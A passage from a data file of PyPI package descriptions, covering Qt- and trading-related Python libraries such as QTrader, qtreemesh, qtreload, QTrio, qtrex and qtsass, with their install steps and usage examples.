Questrade.Basic functionalityThere currently exists some basic functionality to get stock information viaaapl,amzn=qtrade.ticker_information(['AAPL','AMZN'])and current stock quotes can be obtained viaaapl,amzn=qtrade.get_quote(['AAPL','AMZN'])In addition, one can get historical stock quotes viaaapl_history=qtrade.get_historical_data('AAPL','2018-08-01','2018-08-21','OneHour')Here, the last input parameter is the interval between quotes. Another option could be'OneDay'. For more options, see theQuestrade API description.Account informationIn addition, the Questrade API gives access to account information about the accounts connected to\nthe token. The accounts IDs can be accessed viaaccount_ids=qtrade.get_account_id()By using the correct account ID, one can get the positions of the accounts viapositions=qtrade.get_account_positions(account_id=123456)Finally, there exists a method to get all account activities (trades, dividends received, etc.) of\nan account in a certain time frame viaactivities=qtrade.get_account_activities(123456,'2018-08-01','2018-08-16')ContributorsContributions are always appreciated! For example:open an issue for a missing feature or a buggive feedback about existing functionalitymake suggestions for improvementssubmit a PR with a new feature (though reaching out would be appreciated)etc.There is a test suite that can be run viapython -m pytest. This project usespre-commitandblack,flake8andisortwhich takes care of automatic code formatting and linting. 
When setting up the development\nenvironment, runpre-commit installto set up the hook. This will run all the linting automatically when\ncommitting code changes.DisclaimerI am in no way affiliated with Questrade and using this API wrapper is licensed via the MIT license."} +{"package": "qtrader", "pacakge-description": "QTrader: A Light Event-Driven Algorithmic Trading EngineLatest update on 2022-07-20QTrader is a light and flexible event-driven algorithmic trading engine that\ncan be used to backtest strategies, and seamlessly switch to live trading\nwithout any pain.Key FeaturesCompletelysame codefor backtesting / simulation / live tradingSupport trading of various assets: equity, futuresResourceful functionalities to support live monitoring and analysisQuick InstallYou may run the folllowing command to install QTrader immediately:# Virtual environment is recommended (python 3.8 or above is supported)>>condacreate-nqtraderpython=3.8>>condaactivateqtrader# Install stable version from pip (currently version 0.0.2)>>pipinstallqtrader# Alternatively, install latest version from github>>pipinstallgit+https://github.com/josephchenhk/qtrader@masterPrepare the DataQTrader supports bar data at the moment. What you need to do is creating a\nfolder with the name of the security you are interested in. Let's say you want\nto backtest or trade HK equity\"HK.01157\"in frequency of1 minute, your\ndata folder should be like this (where \"K_1M\" stands for 1 minute; you can also\nfind a sample from the qtrader/examples/data):And you can prepare OHLCV data in CSV format, with dates as their file names,\ne.g.,\"yyyy-mm-dd.csv\":Inside each csv file, the data columns should look like this:Now you can specify the path of data folder inqtrader/config/config.py. For\nexample, setDATA_PATH={\"kline\":\"path_to_your_qtrader_folder/examples/data/k_line\",}Implement a StrategyTo implement a strategy is simple in QTrader. A strategy needs to implementinit_strategyandon_barmethods inBaseStrategy. Here is a quick sample:fromqtrader.core.strategyimportBaseStrategyclassMyStrategy(BaseStrategy):definit_strategy(self):passdefon_bar(self,cur_data:Dict[str,Dict[Security,Bar]]):print(cur_data)Record VariablesQTrader provides a module namedBarEventEngineRecorderto record variables\nduring backtesting and/or trading. By default it savesdatetime,portfolio_valueandactionat every time step.If you want to record additional variables (let's say it is calledvar), you\nneed to write a method calledget_varin your strategy:fromqtrader.core.strategyimportBaseStrategyclassMyStrategy(BaseStrategy):defget_var(self):returnvarAnd initialize yourBarEventEngineRecorderwith the same vairablevar=[](if\nyou want to record every timestep) orvar=None(if you want to record only the\nlast updated value):recorder=BarEventEngineRecorder(var=[])Run a BacktestNow we are ready to run a backtest. 
Here is a sample of running a backtest in\nQTrader:# Securitystock_list=[Stock(code=\"HK.01157\",lot_size=100,security_name=\"\u4e2d\u8054\u91cd\u79d1\",exchange=Exchange.SEHK),]# Gatewaygateway_name=\"Backtest\"gateway=BacktestGateway(securities=stock_list,start=datetime(2021,3,15,9,30,0,0),end=datetime(2021,3,17,16,0,0,0),gateway_name=gateway_name,)gateway.SHORT_INTEREST_RATE=0.0gateway.set_trade_mode(TradeMode.BACKTEST)# Core engineengine=Engine(gateways={gateway_name:gateway})# Strategy initializationinit_capital=100000strategy_account=\"DemoStrategy\"strategy_version=\"1.0\"strategy=DemoStrategy(securities={gateway_name:stock_list},strategy_account=strategy_account,strategy_version=strategy_version,init_strategy_cash={gateway_name:init_capital},engine=engine,strategy_trading_sessions={\"HK.01157\":[[datetime(1970,1,1,9,30,0),datetime(1970,1,1,12,0,0)],[datetime(1970,1,1,13,0,0),datetime(1970,1,1,16,0,0)],],)strategy.init_strategy()# Recorderrecorder=BarEventEngineRecorder()# Event engineevent_engine=BarEventEngine({\"demo\":strategy},{\"demo\":recorder},engine)# Start event engineevent_engine.run()# Program terminates normallyengine.log.info(\"Program shutdown normally.\")After shutdown, you will be able to find the results in qtrader/results, with\nthe folder name of latest time stamp:The result.csv file saves everything you want to record inBarEventEngineRecorder; while pnl.html is an interactive plot of the equity\ncurve of your running strategy:Simulation / Live tradingOk, your strategy looks good now. How can you put it to paper trading and/or\nlive trading? In QTrader it is extremely easy to switch from backtest mode to\nsimulation or live trading mode. What you need to modify is justtwolines (replace a backtest gateway with a live trading gateway!):# Currently you can use \"Futu\", \"Ib\", and \"Cqg\"gateway_name=\"Futu\"# Use FutuGateway, IbGateway, or CqgGateway accordingly# End time should be set to a future time stamp when you expect the program terminatesgateway=FutuGateway(securities=stock_list,end=datetime(2022,12,31,16,0,0,0),gateway_name=gateway_name,)# Choose either TradeMode.SIMULATE or TradeMode.LIVETRADEgateway.set_trade_mode(TradeMode.LIVETRADE)That's it! You switch from backtest to simulation / live trading mode now.Important Notice: In the demo sample, the live trading mode will keep on\nsending orders, please be aware of the risk when running it.Live MonitoringWhen running the strategies, the trader typically needs to monitor the market\nand see whether the signals are triggered as expected. QTrader provides with\nsuchdashboard(visualization panel) which can dynamically update the market data and gives\nout entry and exit signals in line with the strategies.You can activate this function in yourconfig.py:ACTIVATED_PLUGINS=[..,\"monitor\"]After running the main script, you\nwill be able to open a web-based monitor in the browser:127.0.0.1:8050:QTrader is also equipped with aTelegram Bot, which allows you get instant\ninformation from your trading program. 
To enable this function, you can add your\ntelegram information inqtrader.config.config.py(you can refer to the\nfollowinglinkfor detailed guidance):ACTIVATED_PLUGINS=[..,\"telegram\"]TELEGRAM_TOKEN=\"50XXXXXX16:AAGan6nFgmrSOx9vJipwmXXXXXXXXXXXM3E\"TELEGRAM_CHAT_ID=21XXXXXX49In this way, your mobile phone with telegram will automatically receive a\ndocumenting message\uff1aYou can use your mobile phone to monitor and control your strategy now.ContributingFork it (https://github.com/josephchenhk/qtrader/fork)Study how it's implemented.Create your feature branch (git checkout -b my-new-feature).Useflake8to ensure your code format\ncomplies with PEP8.Commit your changes (git commit -am 'Add some feature').Push to the branch (git push origin my-new-feature).Create a new Pull Request."} +{"package": "qtradingview", "pacakge-description": "QTradingViewPyQt App for TradingView.Recommends simple login to autosave your draws.IndexFeaturesInstallationUsageFeaturesIncludes the most cryptocurrencies exchanges available in tradingview.Complete lists of available markets, with symbol filter.Favorite and margin lists.Portfolio.Ads remove.InstallationQTradingView needs an environment with Python3 and Qt5Prepare environmentInstallAnacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5conda install -c anaconda pyqtQTradingView from source codepip install poetry\n git clone https://github.com/katmai1/qtradingview\n cd qtradingviewUsageInstall PyQt5 libs using anacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5 and dependenciesconda install -c anaconda pyqtinstallpip install qtradingviewRunning from source using AnacondaCreate and active environment.conda create -n env_name python=3.7\nconda activate env_nameInstall PyQt5 and dependenciesconda install -c anaconda pyqt\npip install -r requirements.txtRunpython apprun.py*Can be install without Anaconda if install all PyQt5 dependencies manually.TroubleshotDatabase issues after an updateProbably the last update does changes into database and this changes are not applied automatically. 
You can try update tables manually.- If running from source:\n python apprun.py --updatedb\n\n- If running compiled release:\n qtradingview --updatedb\n\n* This function works fine whe running from source code, with a compiled version sometimes not update correctly.If issue persist you can delete database to force his create again.- If running from source:\n python apprun.py --deletedb\n\n- If running compiled release:\n qtradingview --deletedb"} +{"package": "qt-range-slider", "pacakge-description": "qt-range-sliderDemo"} +{"package": "q-transformer", "pacakge-description": "No description available on PyPI."} +{"package": "qtreactor", "pacakge-description": "No description available on PyPI."} +{"package": "qt-reactor", "pacakge-description": "QReactorForked from qt5reactor which was forked from qt4reactor and now uses\n[qtpy](https://github.com/spyder-ide/qtpy) to provide to support both.Using the QtReactorInstall using pippip install qt-reactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qreactor\nqreactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] [twisted.test.test_internet]Make sure the plugin directory is in path or in the current directory for\nreactor discovery to work.Testing on Python 3trialdoes not work on Python3 yet. Use Twisted\u2019sPython 3 test runnerinstead.Install the reactor before callingunittest.main().import qreactor\nqreactor.install()\nunittest.main(...)"} +{"package": "qtree", "pacakge-description": "No description available on PyPI."} +{"package": "qtreemesh", "pacakge-description": "QTREEMESHGeneration of QuadTree mesh from an imageExplore the docs \u00bbView Demo\u00b7Report Bug\u00b7Request FeatureTable of ContentsAbout The ProjectGetting StartedInstallationUsageRead ImagePreprocessingQuadTree AlgorithmMesh GenerationExport and ImplementationTheoretical ExplanationRoadmapContributingLicenseContactAcknowledgmentsAbout The ProjectQTREEMESH is a python package that can create aQuadtreestructure from an image. This tree data structure can also be converted to mesh structure that can be used in different areas of science, e.g. finite element analysis. The Quadtree algorithm in this package is based on pixels' intensity. For more information about this algorithm, please refer toTheoretical Explanationsection of this doc.(back to top)Getting StartedThis part explains how to install and use this package.InstallationInstallQTREEMESHfrom PyPI via pip.pipinstallqtreemesh(back to top)UsageThere is atest.pyfile inexamplesfolder that demonstrate how different parts of this package work. Here we go through this file line by line:1. Read ImageFirst we import required tools from other librariesfromPILimportImage# to read image file properlyfromnumpyimportasarray# for converting image matrix to arrayThen we read the image and convert it to gray-scale. There are three example images inexamplesfolder.4.jpgis smaller than the two others and need fewer computation efforts.im=Image.open(\"4.jpg\").convert('L')2. PreprocessingThe quadtree algorithm is most efficient when the image is square and the number of its pixels is an integer power of 2, i.e. $2^n$. 
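As a rough illustration of that power-of-two requirement (a sketch only; the helper name pad_to_power_of_two is made up here and this is not the package's own preprocessing code), zero-padding a grayscale array up to the next power of two with numpy could look like this:

import numpy as np

def pad_to_power_of_two(image: np.ndarray) -> np.ndarray:
    # next power of two covering the larger dimension, e.g. 300 -> 512
    side = 1 << (max(image.shape) - 1).bit_length()
    padded = np.zeros((side, side), dtype=image.dtype)  # zero-intensity background
    padded[:image.shape[0], :image.shape[1]] = image    # original pixels in one corner
    return padded

In practice you would not write this yourself, because the package ships a dedicated helper for exactly this step, introduced next.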
There is a functionimage_preprocess()dedicated to the modification of the original image by padding it with zero intensity pixels and satisfying the mentioned requirement:fromqtreemeshimportimage_preprocessimar=image_preprocess(asarray(im))3. QuadTree AlgorithmThe QuadTree decomposition can be performed onimage_arrayusing a recursive classQTreebased on giventolerance.fromqtreemeshimportQTreequad=QTree(None,imar,125)# QTree(None, image_array, tolerance)QTreeobject may have 4 childrenQTreeobjects (can be accessed through attributes:north_west,north_east,south_west,south_east) and so on. EachQTreehas an attributedividedthat determines the existence of children partitions. There are also an property method for countingcount_leavesand a method for saving tree leavessave_leaves(i.e. undivided partitions).4. Mesh GenerationCommon mesh data structure can be extracted from QuadTree structure usingQTreeMeshclass. After initiating the class, correspondingelementsandnodescan be generated as attributes of theQTreeMeshobject with the methodcreate_elements. The resulted mesh may be illustrated usingdrawmethod.fromqtreemeshimportQTreeMeshmesh=QTreeMesh(quad)mesh.create_elements()mesh.draw(True,'orangered')# mesh.draw(fill_inside, edge_color, save_name)Each element inelementsis aQTreeElementobject that contains many attributes, e.g. element number :number, element nodes :nodes_numbers, element property (average of pixel intensities) :element_propertyand etc.ExampleImageMesh4.jpg5.jpgFor more examples, please refer to theDocumentation5. Export and ImplementationOne can easily export generated mesh asvtkformat using following line:mesh.vtk_export(filename=\"4_meshed.vtk\")and the result can be viewed in visualization applications such asParaView:It's worth mentioning that the methodvtk_export()has no dependency to vtk related libraries and create.vtkfile manually.It is also possible to adjust the elements to handle hanging nodes and generate a mesh that is either triangular or quadrilateral/triangular (based on templates available in [2] and [3]).:fem_nodes,fem_elements,fem_properties=mesh.adjust_mesh_for_FEM()The default configuration generates FEM elements as triangles. To include both quadrilateral and triangle elements, setforce_triagulationtoFalse.(back to top)Theoretical ExplanationIntroductionAQuadtreeis a special type of tree where each parent node has exactly four smaller nodes connected to it. Each square in the Quadtree is represented by a node. If a node has children, their squares are the four quadrants of its own square, which is why the tree is called a tree. This means that when you put the smaller squares of the leaves together, they make up the bigger square of the root.In this figure, labelsNW,NE,SE, andSWare representing different quadrants (North-West, North-East, South-East and South-West respectively).While this algorithm has many applications in various fields of science (e.g., collision detection, image compression, etc.), this doc especially focuses on the mesh generation subject. There almost three major definition of problem:Points set problems:In this case, there are a set of points ${p_i} : (x_i , y_i)$ (which can be interpreted as the position of objects), and we need to build the quadtree in such a way that every square contains at most $c$ point(s). First we consider the root square which contains all the points. Then we start recursively splitting squares until the criteria $n_p \\le c$ met. 
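A minimal sketch of this recursive subdivision follows; it is illustrative only (the class name Quad, the capacity argument and the representation of points as (x, y) tuples are assumptions, not qtreemesh's API), and it ignores edge cases such as duplicate points, a minimum cell size, or points lying exactly on the outer boundary:

class Quad:
    def __init__(self, x, y, size, points, capacity=1):
        # (x, y) is the lower-left corner of the square, size is its side length
        self.x, self.y, self.size = x, y, size
        self.points, self.children = [], []
        if len(points) <= capacity:            # splitting criterion n_p <= c is met
            self.points = points               # this square becomes a leaf
        else:                                  # otherwise recurse into NW, NE, SW, SE
            half = size / 2
            for dx, dy in ((0, half), (half, half), (0, 0), (half, 0)):
                inside = [p for p in points
                          if x + dx <= p[0] < x + dx + half
                          and y + dy <= p[1] < y + dy + half]
                self.children.append(Quad(x + dx, y + dy, half, inside, capacity))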
In following figure, the quadtree of 11 points with $c = 1$ is illustrated:There are many different implementations of this variation of algorithm, for example inPython,C++, andC#.Domain boundary problems:This type of problem is very common in mesh generation for CAD models. The domain of interest is defined by some lines that usually separate inside of the domain from outside of it. A common approach is to generateseed pointson the boundary and create a quadtree just the same as points set problems. There will be some additional steps to convert quadtree to FEM mesh, such as removing the outside squares and trimming of boundary squares. The following figure illustrate quadtree ofa circular domain.Digital images problems:The quadtree decomposition of an image means dividing the image into squares with the same color (within a given threshold). Considering an image consisting of $2^n \u00d7 2^n$ pixels, the algorithm recursively split the image into four quadrants until the difference between the maximum and minimum pixels intensities becomes less than the specified tolerance.The current package is dedicated to these types of problems.Referencesde Berg, M., Cheong, O., van Kreveld, M., & Overmars, M. (2008). Computational geometry: Algorithms and applications. In Computational Geometry: Algorithms and Applications. Springer Berlin Heidelberg.https://doi.org/10.1007/978-3-540-77974-2Lo, D.S.H. (2015). Finite Element Mesh Generation (1st ed.). CRC Press.https://doi.org/10.1201/b17713George, P. L. (1992). Automatic mesh generation and finite element method. Wiley.https://doi.org/10.1016/S1570-8659(96)80003-2RoadmapCompleting the codes documentationAdding details to README fileExporting data asvtkformatSuccessfully implement in FEM softwareHandling hanging nodesPrepare required dataIllustrate usage in open-source FEM programsPrepare required data for SBFEMSee theopen issuesfor a full list of proposed features (and known issues).(back to top)ContributingContributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make aregreatly appreciated.If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag \"enhancement\".\nDon't forget to give the project a star! Thanks again!(back to top)LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.(back to top)ContactSadjad Abedi -AbediSadjad@gmail.comProject Link:https://github.com/Sad-Abd/qtreemesh(back to top)Acknowledgments(back to top)"} +{"package": "qtregpy", "pacakge-description": "qtregpyThis package provides the software tools to implement Quantile Transformation Regression introduced inSpady and Stouli (2020).With the tools in this package it is possible to obtain inference and estimation results for conditional distribution,\nquantile and density functions implied by flexible Gaussian representations.For further details, please refer to the original text.InstallationYou can install gtregpy with pip directly from PyPI.pip install qtregpyUsageHere's a simple example of how to use gtregpy:importqtregpyasqtrmel_data_path='filepath/melbeourne.csv'x,y=qtr.load_mel_data(mel_data_path)mel_answer=qtr.compute_basic(x,y)DocumentationYou can find more detailed documentation for each function in docstrings.TestingTo run the tests, use the following command:pytesttests/ContributingWe welcome contributions! 
Please see the Contribution Guide file for details on how to contribute. License: This package is licensed under the MIT license. See the LICENSE file for details."} +{"package": "qtreload", "pacakge-description": "qtreload: Qt utilities to enable hot-reloading of Python/Qt code. Have you been using Jupyter Notebook's magic functions such as %load_ext autoreload\n%autoreload 2 where you might have been editing code in VSCode or PyCharm and executing actions in Jupyter Notebook? Or have you previously used LiClipse, which has Debugger Auto-Reload? Well, qtreload provides similar capabilities by 'hot-reloading' Python modules when there are changes to\nthe source code. It operates by generating a list of all possible modules/submodules for a specific project and\nthen using QFileWatcher to observe any changes to these files. This library should be used when developing Qt code in Python and you are not interested in continually having to restart your application. (See limitations to find out when it's still required.) Usage: You can instantiate the QtReloadWidget manually or by using the install_hot_reload function. Note! Make sure to instantiate QApplication before running this code. Using QtReloadWidget: from qtreload.qt_reload import QtReloadWidget\n\n# you can specify the list of modules that should be monitored\nlist_of_modules = [\"napari\", \"spyder\", \"...\"]\n\nwidget = QtReloadWidget(list_of_modules) That's pretty much it. Now every change you make to the source code of e.g. napari will be reflected in your interpreter. Using install_hot_reload requires two environment variables to be set, namely: QTRELOAD_HOT_RELOAD=1\nQTRELOAD_HOT_RELOAD_MODULES=\"napari, spyder\" Then you can just execute the following: from qtreload.install import install_hot_reload\n\ninstall_hot_reload() When it works like magic: There are countless examples where this approach works really well. Some examples: You are running your application where you have a method on_run, but when you execute this function you notice that you misspelled some variable. In normal circumstances you would need to restart the application. Now, however, you can correct it in your IDE, save, and try running again. You are running your application and are modifying the layout of a popup window. Now you can do this, and each time the dialog is reshown the new version of the dialog will be shown. Limitations: While this approach can be extremely useful and can save a lot of time, it has a couple of limitations: code within __init__.py cannot be reloaded; some changes to GUI code cannot be reloaded - if e.g. you are modifying the QMainWindow and just added a new button, this button will not be shown. In order to show it, you will still need to restart the application. If, however, you were modifying a plugin or a dialog that is shown upon clicking on e.g.
menu item, these changes WILL take place.modifying python properties (@setter/@getter) is not always reloadedAcknowledgementsThe hot-reload code is directly copied from the PyDev debugger developed byfabiozwith minimal changes to remove any dependenciesSeehttps://github.com/fabioz/PyDev.Debugger/blob/main/_pydevd_bundle/pydevd_reload.py"} +{"package": "qtrename", "pacakge-description": "QtRenamefeature-rich app to rename files for GNU/Linux and WindowsInstallationDescriptionLicenseFeaturesReport a bug - Request featureScreenshotsChangelogInstallationLinux:pip install qtrenameTo avoid running the app from the command line, you need to add it to your apps menu:Download thisscriptOpen the terminal andcdto the location ofsetup.shrun:chmod u+x setup.shrun:./setup.shHead to your apps menu, type qtfind or you can find it under Accessories.Windows:Download the installer fromhere[RequireMicrosoft Visual C++ 2015 Redistributable]Description:heavy_check_mark:QtRenameis a graphical interface for bulk renaming.:heavy_check_mark:QtRenameeasy to use.:heavy_check_mark:QtRenameis for for Linux and Windows.:heavy_check_mark:QtRenameis made with PyQt5LicenseThis program comes with absolutely no warranty. See theGNU General Public Licence, version 3 or later for details.FeaturesFind and Replace:Skip the firstNoccurrencesReplace maxNoccurrencesCase sensitiveSwap chunks of charactersfind occurrences using RegExCasing:Change case file, extension or both (upper, lower, sentence, title, invert, random)Ignore upper and/or mixed caseAdd/RemoveInsert/Overwrite/Remove characters at a specific position (backwards option available)Combine Insert/Overwrite/RemoveMovecharacters from onne position to another (absolute/relative position, backwards,)Spaces:Remove leading/trailing/multiple spacesKeep a space before/after a set of charactersReplace specific character with a spacesReplace a consecutive set of a specific characters with 1 spaceCounter:Insert numbers at the begining/end of the filenameReplace the filename with a unified nameSet a seperator between counter and filenameEnumerate:Start counter from a specific numbersCounter stepSet a separatorZero paddingExtra:Realtime previewSelective previewRename filename, extension or bothNavigate directories (folders): from the list, open dialog, type in completerfilter by extensionRename files / directories (folders) / subdirectories (sub-folders)Themes: default and dark (4 tones: blue, green, orange and pink)Undo renaming (only last one)Errors LogReport a bug - Request featurehttps://github.com/amad3v/QtRename/issuesScreenshotsDark theme (Linux):Default theme (Windows):ScreenshotsScreenshotsChangelog1.1.1:Fix treating directories as files when Process Extension is selected.Fix animation doesn't stop if RegEx is invalid.Fix no preview in some cases.Fixed error message shown multiple times.1.1.0:Fixed MVC bugsFixed folders/Files opened incrementallyAdjusted GUI for low resolution screensAdded french translationMinor improvements1.0.0:Initial releaseCopyright :copyright: 2020 - amad3v"} +{"package": "qtrer", "pacakge-description": "\u6839\u636e\u7ffb\u8bd1\u6587\u6863\u548cOPENCC(\u7b80\u4f53\u548c\u7e41\u4f53\u8f6c\u6362)\u5bf9Qt\u7ffb\u8bd1\u6587\u4ef6\u8fdb\u884c\u7ffb\u8bd1\u7684\u5c0f\u5de5\u5177"} +{"package": "qtrex", "pacakge-description": "qtrexQuery template rendering and execution library written in Python.The goal ofqtrexis to provide a simple API that supports loading.sqlfiles that can be templated withjinja, and provide extensible configuration\noptions to either 
compile the files, and execute the rendered templates against\nvarious databases.Getting Startedqtrexis installable athttps://pypi.org/project/qtrex/viapipusing:We currently only supportbigquery, but plan on adding other DB support as\noptional dependencies.pip install 'qtrex[bigquery]==0.0.5'ExamplesHere is a brief example usage ofqtrex.Assuming you have query templates in a directory on a local filesystem, using\nour test suite as an example:|tests\n |--test_*.py\n |--testdata\n |--mytemplate.sql\n |--ingest\n |--another_file_ext.j2\n |--another_query.sqlWhere./tests/testdata/mytemplate.sqlhas the following contents:SELECTSUM(x)FROMUNNEST({{params.test_array}})ASxand./tests/testdata/ingest/another_query.sqlhas:SELECT*FROM`{{params.my_project_id}}.{{params.my_dataset}}.{{params.my_table}}`and lastly,./tests/testdata/nested_params.sqlhas:SELECT{{params.test_dict_key.one}}+{{params.test_dict_key.two}}Next, we want to have our.yamlconfig (or extendqtrex.config.BaseConfig)\nto implement your own config mechanism.Our./tests/example.yamlwill look like:params:-key:test_string_keyvalue:\"string_value\"-key:test_array_keyvalue:[1,2,3]-key:test_dict_keyvalue:one:1two:2three:3We can now run the following script (./tests/example.py) after changing\ninto the./testsdirectoryfromqtrex.executorimportBigQueryExecutorfromqtrex.storeimportStorefromqtrex.configimportYAMLConfigdefmain():withopen(\"./example.yaml\",\"r\")asf:cfg=YAMLConfig(f)store=Store.from_path(cfg,\"./testdata\")ex=BigQueryExecutor()forquery_refinstore:print(f\"{query_ref.name}:{query_ref.template}\\n\")res=ex.execute(query_ref,dry_run=True)print(f\"results:{res}\")if__name__==\"__main__\":main()When we run this script:cd./tests\npythonexample.pywe should see the following instdoutmytemplate.sql: SELECT SUM(x)\nFROM UNNEST([1, 2, 3]) AS x\n\nresults: QueryResult(query_ref=QueryRef(filename='./testdata\\\\mytemplate.sql', template='SELECT SUM(x)\\nFROM UNNEST([1, 2, 3]) AS x', name='mytemplate.sql'), df=None, error=None)\nnested_params.sql: SELECT\n 1 + 2\n\nresults: QueryResult(query_ref=QueryRef(filename='./testdata\\\\nested_params.sql', template='SELECT\\n 1 + 2', name='nested_params.sql'), df=None, error=None)"} +{"package": "qtrf", "pacakge-description": "# qtrfWidgets for RF inputs written in Qt for Python (PySide6).## RequirementsPython 3PySide6ddtfor development and test only"} +{"package": "qtrio", "pacakge-description": "ResourcesDocumentationRead the DocsChatGitterForumDiscourseIssuesGitHubRepositoryGitHubTestsGitHub ActionsCoverageCodecovDistributionPyPIIntroductionNote:This library is in early development. It works. It has tests. It has\ndocumentation. Expect breaking changes as we explore a clean API. By paying this\nprice you get the privilege to provide feedback viaGitHub issuesto help shape our\nfuture.:]The QTrio project\u2019s goal is to bring the friendly concurrency of Trio using Python\u2019sasyncandawaitsyntax together with the GUI features of Qt to enable more\ncorrect code and a more pleasant developer experience. QTrio ispermissively licensedto avoid introducing\nrestrictions beyond those of the underlying Python Qt library you choose. Both PySide2\nand PyQt5 are supported.By enabling use ofasyncandawaitit is possible in some cases to write\nrelated code more concisely and clearly than you would get with the signal and slot\nmechanisms of Qt concurrency. In this set of small examples we will allow the user to\ninput their name then use that input to generate an output message. 
The user will be\nable to cancel the input to terminate the program early. In the first example we will\ndo it in the form of a classic \u201chello\u201d console program. Well, classic plus a bit of\nboilerplate to allow explicit testing without using special external tooling. Then\nsecond, the form of a general Qt program implementing this same activity. And finally,\nthe QTrio way.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/console.py.defmain(input_file:typing.TextIO=sys.stdin,output_file:typing.TextIO=sys.stdout)->None:try:output_file.write(\"What is your name? \")output_file.flush()name=input_file.readline()[:-1]output_file.write(f\"Hi{name}, welcome to the team!\\n\")exceptKeyboardInterrupt:passNice and concise, including the cancellation viactrl+c. This is because we can\nstay in one scope thus using both local variables and atry/exceptblock. This\nkind of explodes when you shift into a classic Qt GUI setup.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/qt.py.classMain:def__init__(self,application:QtWidgets.QApplication,input_dialog:typing.Optional[QtWidgets.QInputDialog]=None,output_dialog:typing.Optional[QtWidgets.QMessageBox]=None,):self.application=applicationifinput_dialogisNone:# pragma: no coverinput_dialog=create_input()ifoutput_dialogisNone:# pragma: no coveroutput_dialog=create_output()self.input_dialog=input_dialogself.output_dialog=output_dialogdefsetup(self)->None:self.input_dialog.accepted.connect(self.input_accepted)self.input_dialog.rejected.connect(self.input_rejected)self.input_dialog.show()definput_accepted(self)->None:name=self.input_dialog.textValue()self.output_dialog.setText(f\"Hi{name}, welcome to the team!\")self.output_dialog.finished.connect(self.output_finished)self.output_dialog.show()definput_rejected(self)->None:self.application.quit()defoutput_finished(self)->None:self.application.quit()The third example, below, shows how usingasyncandawaitallows us to\nreturn to the more concise and clear description of the sequenced activity.\nMost of the code is just setup for testability with only the last four lines\nreally containing the activity.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/qtrio_example.py.asyncdefmain(*,task_status:trio_typing.TaskStatus[Dialogs]=trio.TASK_STATUS_IGNORED,)->None:dialogs=Dialogs()task_status.started(dialogs)withcontextlib.suppress(qtrio.UserCancelledError):name=awaitdialogs.input.wait()dialogs.output.text=f\"Hi{name}, welcome to the team!\"awaitdialogs.output.wait()"} +{"package": "qtrotate", "pacakge-description": "Quicktime/MP4 rotation tool============================.. image:: https://badge.fury.io/py/qtrotate.svg:target: https://badge.fury.io/py/qtrotateTool to read or change a new rotation meta of mp4 (Quicktime) files (e.g. from iphones and similar).Installation------------.. code-block:: bash$ pip install qtrotateQuickstart------------.. code-block:: pythonimport qtrotaterotation = qtrotate.get_set_rotation(file_path)From terminal------------.. 
code-block:: bash$ ./qtrotate.py myfile.mp4 # Read rotation from mp490$ ./qtrotate.py myfile2.mp4 -90 # Set rotation$ ./qtrotate.py myfile2.mp4270"} +{"package": "qtrunner", "pacakge-description": "\u4e2d\u6587\u8bf4\u660eintroductionrunneris aconfigurablequick launcher forstarting (running)commonly usedcommands (programs). It comes\nwith alogoutput interface, which is convenient for users toview (color)andsavelog. And the log output in a special\nformat can also drive the program to draw aprogress bar.main-uiinstallpip install -r requirements.txtonly tested on thewindwosplatform, recommended to use thepython 3.7version.start uppython runner.py - run from codebaserunner - run after installconfiguremain configuration fileconfig.json{\"maxLogLines\":1000,// max lines to view\"maxStdout\":40960,// max block of stdout\"defaultEncoding\":\"gbk\",// default stdout encodding\"configs\":[// sub configuration item{\"file\":\"runner_common.json\",// sub configuration file\"title\":\"\u901a\u7528(\u6d4b\u8bd5)\"// title in ui}]}sub configuration filerunner_xxxx.json[{\"title\":\"change codepage to gbk(use with caution)\",// title in ui\"cmd\":\"cmd /c chcp 936\",// command ling\"encoding\":\"gbk\",// output encoding\"qss\":\"color: rgb(150, 0, 0);\",// ui styles in qss format\"cwd\":\"\",// current working directory\"env\":{// environment variables\"GP_LANGUAGE\":\"zh_CN\"}}]"} +{"package": "qts", "pacakge-description": "ResourcesDocumentationRead the DocsIssuesGitHubRepositoryGitHubTestsGitHub ActionsDistributionPyPIIntroductionNoteqts is presently an exploratory project.\nIt does have test coverage and is significantly documented.\nIt only covers a few Qt modules.qts is a Qt5/6 and PyQt/PySide compatibility layer for your libraries and applications.\nIt is designed to work with mypy and includes a CLI utility to notify mypy of the needed conditions.\nTo keep the scope reasonable, qts will focus on the variances that all code using Qt will need such as imports and signals.\nNuanced detailed differences will not be abstracted away.\nHelper functions and similar may be provided on a case by case basis.importqtsimportqts.utildefmain():qts.set_wrapper(qts.available_wrappers()[0])fromqtsimportQtWidgetsapplication=QtWidgets.QApplication([])widget=QtWidgets.QLabel(\"this is qts\")widget.show()qts.util.exec(application)main()"} +{"package": "qtsass", "pacakge-description": "QtSASS: Compile SCSS files to Qt stylesheetsCopyright \u00a9 2015 Yann LanthonyCopyright \u00a9 2017\u20132018 Spyder Project ContributorsOverviewSASSbrings countless amazing features to CSS.\nBesides being used in web development, CSS is also the way to stylize Qt-based desktop applications.\nHowever, Qt's CSS has a few variations that prevent the direct use of SASS compiler.The purpose of this tool is to fill the gap between SASS and Qt-CSS by handling those variations.Qt's CSS specificitiesThe goal of QtSASS is to be able to generate a Qt-CSS stylesheet based on a 100% valid SASS file.\nThis is how it deals with Qt's specifics and how you should modify your CSS stylesheet to use QtSASS.\"!\" in selectorsQt allows to define the style of a widget according to its states, like this:QLineEdit:enabled{...}However, a \"not\" state is problematic because it introduces an exclamation mark in the selector's name, which is not valid SASS/CSS:QLineEdit:!editable{...}QtSASS allows \"!\" in selectors' names; the SASS file is preprocessed and any occurence of:!is replaced by:_qnot_(for \"Qt not\").\nHowever, using this feature prevents from having 
